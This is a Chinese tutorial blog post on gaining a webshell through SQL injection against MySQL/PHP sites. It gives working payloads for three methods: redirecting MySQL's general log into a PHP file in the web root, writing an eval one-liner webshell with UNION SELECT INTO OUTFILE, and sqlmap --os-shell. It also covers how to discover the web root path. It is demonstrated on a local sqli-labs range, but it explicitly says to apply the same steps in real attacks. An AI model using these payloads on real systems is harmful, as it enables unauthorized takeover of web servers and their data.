sql注入拿shell

1.日志法拿shelll(这个适合于存在堆叠注入和已经登录上MYSQL的数据库管理工具的时候,还需要知道网站根目录的决对路径)

1.首先解释一下的什么是堆叠注入:就是通过 ; 隔断后可以执行第二条SQL语句如下面的SQL语句,通过;隔断后两个SQL语句依然可以执行

2.然后的话就是日志法拿shell的方法,首先需要通过show variables like '%general%'; 查看这个数据库日志是不是开启了,还可以查到一些数据库的路径

3.如果general_log是off,代表该数据的日志是关闭的,所以需要通过set global general_log = on;来开启

4.当然开启日志以后我们需要将日志文件的路径改在网站根目录下,由于我使用的是phpstudy搭建的php网站,而这个MYSQL在phpstudy搭建的环境当做一般是和WWW也就是网站根目录在一个目录下的,所以可以将日志文件的路径改在网站根目录下,文件类型是php文件,这样后面就可以写一句话木马了,这里设置的日志文件路径是在G:/Desktop/web/WWW里面的guo.php

5.可以看到已经有一个日志文件生成在网站根目录下面了

6.这个时候只需要执行含有一句话木马的SQL语句就可以了

比如说

select '<?php eval($_REQUEST)?>';

7.然后就可以看到一句话木马在这个日志文件里面

8.直接用蚁剑连接,密码是8,拿下网站

9.如果是实战过程也就是http://xxx/xxxx.php?id=1 这样的的网站,利用的二次注入方法就是

http://xxx/xxxx.php?id=1;

在这个;后面执行依次上面的语句

10.那么最后是如何知道路径,有这几种方法

第一种方法是: 在id = [1] 这个就是直接将参数传一个数组一般情况下会报错,或者传一些特殊的参数也可以,特殊的符号如 % @

第二种方法是通过: 网站泄露的一些敏感目录,获取敏感信息,得到路径,比如说探针,找这些敏感路径的方法可以通过目录扫描

第三种方法就是通过查数据库的路径,通过

select @@datadir; 查询后通过推测网站根目录

2.通过写文件函数into outfile 和 into dumpfile拿shell(这个只需要相对路径)

实现这个方法的前提:

web目录具有写权限,能够使用单引号

知道网站根目录相当于数据库的相对路径(这个容易猜)

secure_file_priv没有具体值,也就是在my.ini这个文件里面

1.利用过程,这边利用本地搭建的靶场测试,在下图可以看到测试出的两个输出点在2和3,这个很重要因为一句话木马需要写在这个输出点的位置

2.然后就是http://127.0.0.1/sqlilabs/Less-1/index.php?id=9.999 ' union select 1,'<?php eval($_REQUEST[8])?>',3 into outfile '../../WWW/ld.php' -- qwe 这个里面outfile可以替换为dumpfile是一样的效果,这个网站根目录相对路径一般是 ../.../WWW ../../ 刚好可以从库名文件跳到data再跳到同时存在WWW和data的目录

执行上面的http://127.0.0.1/sqlilabs/Less-1/index.php?id=9.999 ' union select 1,'<?php eval($_REQUEST[8])?>',3 into outfile '../../WWW/ld.php' -- qwe 刚好可以将文件写在网站根目录下面,里面包含一句话木马

3.直接拿蚁剑连接,密码为8

4.对于路径问题可以写相对的也可以写绝对的

获取路径的方法和第一种拿shell的一样

3.sqlmap拿shell

1.首先需要 python sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/index.php?id=1' --is-dba 测试网站

current user is DBA: True 这个是否为True

如果为True可以进行下一步

2.通过sqlmap-master>python sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/index.php?id=1' --os-shell

拿shell,下面有几个在跑包的时候可能会出现选项

第一个默认y

2.第二个选择语言,上面站就用什么语言,这个是php的站所以我用4

3.然后选择语言后,还有选择也是y

5.选择好后输入路径 G:\Desktop\web\WWW 这个是根目录

6.拿下权限

有个os-shell会话出现就可以在里面执行cmd命令

相关推荐
独孤求败Ace2 小时前
第54天:Web攻防-SQL注入&数据类型&参数格式&JSON&XML&编码加密&符号闭合&复盘报告
xml·java·sql
abka2 小时前
系统架构的评估的系统的质量属性
数据库·系统架构
笨手笨脚の2 小时前
Redis 源码分析-内部数据结构 ziplist
数据结构·数据库·redis·链表·ziplist
逆鱼_044 小时前
HTML网上商城项目(sqlite3)
数据库·sqlite·html
weixin_466485114 小时前
qt5中使用中文报错error: C2001: 常量中有换行符
android·java·qt
信徒_4 小时前
kafka 中的 rebalance
数据库·分布式·kafka
苏柘_level64 小时前
【Android14】Android系统内置第三方应用时OpenSSL版本冲突的深度解析与解决方案优化
android
轨迹H5 小时前
sql-labs less-1-5wp
数据库·sql·网络安全·渗透测试·less·web漏洞
lucky登5 小时前
Redis项目_黑马点评
数据库·redis·缓存